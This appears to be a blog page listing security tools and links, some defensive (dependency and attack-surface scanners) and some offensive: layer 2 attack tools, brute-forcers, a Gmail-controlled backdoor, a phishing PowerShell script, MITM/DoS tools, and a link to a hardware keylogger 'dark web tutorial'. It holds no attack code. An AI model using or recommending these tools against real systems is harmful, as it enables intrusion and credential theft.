Tools

Note: Some tools that are relevant to a specific topic, are listed under the topic and not here.

  1. Yersinia – layer 2 attacks tool in protocols such as: STP, CDP, DTP, DHCP, HSRP, etc. Built-in in kali
    1. https://github.com/tomac/yersinia
    2. http://www.yersinia.net/
    3. http://tools.kali.org/vulnerability-analysis/yersinia
  2. pinfinder – Recovers the restrictions passcode on iOS devices from an iTunes backup
    1. https://github.com/gwatts/pinfinder
  3. XXEinjector – Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
    1. https://github.com/enjoiz/XXEinjector
  4. HostileSubBruteforcer – bruteforcing dns subdomains
    1. https://github.com/nahamsec/HostileSubBruteforcer
  5. wp-bruteforcer – A simply PHP CLI Tool / Lib to bruteforce WordPress XMLRPC using amplification
    1. https://github.com/arall/wp-bruteforcer
  6. PGPCrack-NG – program designed to brute-force symmetrically encrypted PGP files. It is a replacment for the long dead PGPCrack.
    1. https://github.com/kholia/PGPCrack-NG
  7. Pixie-WPS – An offline WPS bruteforce utility
    1. https://github.com/wiire/pixiewps
  8. SIMBL – cracking an objective-c app without modifying it using SIMBL + method swizzling. SIMBL injects code into an application during its load
    1. https://github.com/Fuzion24/OSX_Swizzler
  9. JexBoss – tool for testing and exploiting vulnerabilities in JBoss Application Server
    1. https://github.com/joaomatosf/jexboss
  10. USB-Rubber-Ducky – The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input
    1. https://github.com/hak5darren/USB-Rubber-Ducky
    2. big list of available payloads:
      https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
  11. skipfish – old web security scanning tool but sounds cool:
    advantages include:
    * High performance: 500+ requests per second against responsive Internet
    targets, 2000+ requests per second on LAN / MAN networks, and 7000+ requests
    against local instances have been observed, with a very modest CPU, network,
    and memory footprint. This can be attributed to:
    * Multiplexing single-thread, fully asynchronous network I/O and data
    processing model that eliminates memory management, scheduling, and IPC
    inefficiencies present in some multi-threaded clients.
    * Advanced HTTP/1.1 features such as range requests, content compression,
    and keep-alive connections, as well as forced response size limiting, to
    keep network-level overhead in check.
    * Smart response caching and advanced server behavior heuristics are used to
    minimize unnecessary traffic.
    * Performance-oriented, pure C implementation, including a custom
    HTTP stack.A nice list of stuff to check in web pentesting:
    list of the security checks offered by the tool is outlined below.* High risk flaws (potentially leading to system compromise):
    * Server-side query injection (including blind vectors, numerical parameters).
    * Explicit SQL-like syntax in GET or POST parameters.
    * Server-side shell command injection (including blind vectors).
    * Server-side XML / XPath injection (including blind vectors).
    * Format string vulnerabilities.
    * Integer overflow vulnerabilities.
    * Locations accepting HTTP PUT.* Medium risk flaws (potentially leading to data compromise):

    * Stored and reflected XSS vectors in document body (minimal JS XSS support).
    * Stored and reflected XSS vectors via HTTP redirects.
    * Stored and reflected XSS vectors via HTTP header splitting.
    * Directory traversal / LFI / RFI (including constrained vectors).
    * Assorted file POIs (server-side sources, configs, etc).
    * Attacker-supplied script and CSS inclusion vectors (stored and reflected).
    * External untrusted script and CSS inclusion vectors.
    * Mixed content problems on script and CSS resources (optional).
    * Password forms submitting from or to non-SSL pages (optional).
    * Incorrect or missing MIME types on renderables.
    * Generic MIME types on renderables.
    * Incorrect or missing charsets on renderables.
    * Conflicting MIME / charset info on renderables.
    * Bad caching directives on cookie setting responses.

    * Low risk issues (limited impact or low specificity):

    * Directory listing bypass vectors.
    * Redirection to attacker-supplied URLs (stored and reflected).
    * Attacker-supplied embedded content (stored and reflected).
    * External untrusted embedded content.
    * Mixed content on non-scriptable subresources (optional).
    * HTTPS -> HTTP submission of HTML forms (optional).
    * HTTP credentials in URLs.
    * Expired or not-yet-valid SSL certificates.
    * HTML forms with no XSRF protection.
    * Self-signed SSL certificates.
    * SSL certificate host name mismatches.
    * Bad caching directives on less sensitive content.

    * Internal warnings:

    * Failed resource fetch attempts.
    * Exceeded crawl limits.
    * Failed 404 behavior checks.
    * IPS filtering detected.
    * Unexpected response variations.
    * Seemingly misclassified crawl nodes.

    * Non-specific informational entries:

    * General SSL certificate information.
    * Significantly changing HTTP cookies.
    * Changing Server, Via, or X-… headers.
    * New 404 signatures.
    * Resources that cannot be accessed.
    * Resources requiring HTTP authentication.
    * Broken links.
    * Server errors.
    * All external links not classified otherwise (optional).
    * All external e-mails (optional).
    * All external URL redirectors (optional).
    * Links to unknown protocols.
    * Form fields that could not be autocompleted.
    * Password entry forms (for external brute-force).
    * File upload forms.
    * Other HTML forms (not classified otherwise).
    * Numerical file names (for external brute-force).
    * User-supplied links otherwise rendered on a page.
    * Incorrect or missing MIME type on less significant content.
    * Generic MIME type on less significant content.
    * Incorrect or missing charset on less significant content.
    * Conflicting MIME / charset information on less significant content.
    * OGNL-like parameter passing conventions.

    Along with a list of identified issues, skipfish also provides summary
    overviews of document types and issue types found; and an interactive
    sitemap, with nodes discovered through brute-force denoted in a distinctive
    way.

    NOTE: As a conscious design decision, skipfish will not redundantly complain
    about highly non-specific issues, including but not limited to:

    * Non-httponly or non-secure cookies,
    * Non-HTTPS or autocomplete-enabled forms,
    * HTML comments detected on a page,
    * Filesystem path disclosure in error messages,
    * Server of framework version disclosure,
    * Servers supporting TRACE or OPTIONS requests,
    * Mere presence of certain technologies, such as WebDAV.

    https://github.com/firebitsbr/skipfish

  12. TagCube – Web security scanner
    1. https://www.tagcube.io/
    2. CLI to launch web application security scans using TagCube’s REST API – https://github.com/tagcubeio/tagcube-cli
  13. Shell In A Box – implements a web server that can export arbitrary command line tools to a web based terminal emulator. This emulator is accessible to any JavaScript and CSS enabled web browser and does not require any additional browser plugins. Most typically, login shells would be exported this way:shellinaboxd -s /:LOGIN
    This command starts a web server at http://localhost:4200 that allows users to login with their username and password and to get access to their login shell.All client-server communications are encrypted, if SSL/TLS certificates have been installed.

    1. https://code.google.com/p/shellinabox/
  14. AVulnerabilityChecker – Tool to check if your computer is likely to be vulnerable to exploitable constant Read-Write-Execute (RWX) addresses (AVs vulnerability)
    1. anti-virus products allocate memory with RWX permissions at a predictable address http://breakingmalware.com/vulnerabilities/sedating-watchdog-abusing-security-products-bypass-mitigations/
    2. The tool – https://github.com/BreakingMalware/AVulnerabilityChecker
  15. Snyk – helps you find and fix known vulnerabilities in your Node.js dependencies
    1. https://github.com/Snyk/snyk
    2. vulnerability database used by Snyk https://github.com/Snyk/vulndb
  16. Hook Analyzer – Malware Analysis and Cyber Threat Intelligence Software
    1. http://www.hookanalyser.com/2015/07/hook-analyser-32-major-release.html
  17. gcat – A fully featured backdoor that uses Gmail as a C&C server
    1. https://github.com/byt3bl33d3r/gcat
  18. HawkEye – .Net Runtime object editor – Allows dynamically modifying .Net programs while they run
    1. http://dev.bukkit.org/bukkit-plugins/hawkeye/
  19. JavaSnoop – Like HawkEye but for java. But it doesn’t let change GUI objects directly, it instead allows to execute code that will change them. This difference comes from the difference between the JVM compared to .Net CLR.
    1. https://code.google.com/p/javasnoop/
    2. https://vimeo.com/19051012
  20. ReFrameworker – like javasnoop just for android. It hooks the java framework of the android. Its open source inside AppUse android pentesting VM
    1. https://appsec-labs.com/Managed_Code_Rootkits/
  21. Hardware keylogger (dark web tutorial)
    1. http://genesisktrk2q3ud.onion.city/index.php?topic=90.msg194
    2. https://www.keelog.com/
  22. Phishing powershell script
    1. https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
    2. https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1
  23. Blackbone – Windows memory hacking library
    1. https://github.com/DarthTon/Blackbone
  24. Script to reset the krbtgt account password and related keys to limit golden ticket life time
    1. http://blogs.microsoft.com/cybertrust/2015/02/11/krbtgt-account-password-reset-scripts-now-available-for-customers/
    2. https://gist.githubusercontent.com/mubix/fd0c89ec021f70023695/raw/02e3f0df13aa86da41f1587ad798ad3c5e7b3711/Reset-KrbtgtKeyInteractive.ps1
    3. http://www.reddit.com/r/netsec/comments/2vtn42/krbtgt_account_password_reset_scripts_now/
  25. SqlPerms – Simple command line tool that can monitor Microsoft SQL Server for a period of query activity and then return the smallest set of permissions necessary to execute all of the monitored queries
    1. https://github.com/iSECPartners/sqlperms
    2. https://isecpartners.github.io/tools/2015/02/09/sqlperms.html
  26. Attack Surface Analyzer – Attack Surface Analyzer can help understand the changes in Windows systems’ attack surface resulting from the installation of an application. This tool essentially allows you to take a “snap shot” of a bunch of security related information on a system. Then after the system changes, you can take another “snap shot” and the tool will compare the before and after “snap shots” and show you what changed in an HTML report.
    1. http://blogs.microsoft.com/cybertrust/2012/08/02/microsofts-free-security-tools-attack-surface-analyzer/
  27. SDL Regex Fuzzer – Allows to test a regular expression for ReDOS vulnerability
    1. http://blogs.microsoft.com/cybertrust/2010/10/12/new-tool-sdl-regex-fuzzer/
    2. https://www.microsoft.com/en-us/download/details.aspx?id=20095
  28. SharePoint Configuration Analyzer
    1. https://technet.microsoft.com/en-us/library/cc288082(v=office.12).aspx
    2. http://www.foxtoo.com/Windows/download-SharePoint-Security-Analyzer-10629102.htm
  29. Acunetix – website vulnerability scanner
    1. http://www.acunetix.com/vulnerability-scanner/
  30. Evil Foca – MITM, DOS, hijacking attacks tool
    1. https://www.elevenpaths.com/labstools/evil-foca/index.html
  31. revtan – php dork scanner, password: hocib0.blogspot.com
    1. http://www.mediafire.com/download/g6guyxdosxr5ofj/toolrevtan.zip
  32.  Gr3eNoX-Exploit-Scanner
    1. https://hostr.co/kX3lVjuVOOmd
  33. GooDork – command line google dorking tool
    1. https://github.com/k3170makan/GooDork
  34. BinGoo – scan website using google dorks and other techniques and also allows exploiting the vulnerabilities found
    1.  https://github.com/Hood3dRob1n/BinGoo
  35. xcodescanner – website vulnerability scanner
    1. http://sourceforge.net/projects/xcodescanner/
  36. Online Scanners:
    1. GameSec website scanner includes one free trial scan
      1. https://www.gamasec.com/gsf/FreeTrial.aspx
    2. Xss and SQLI scanner
      1. http://find-xss.net/scanner/?l=en
    3. Port scanner
      1. https://hackertarget.com/nmap-online-port-scanner/
    4. Website scanner
      1. https://www.punkspider.org/
Advertisements

One thought on “Tools

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s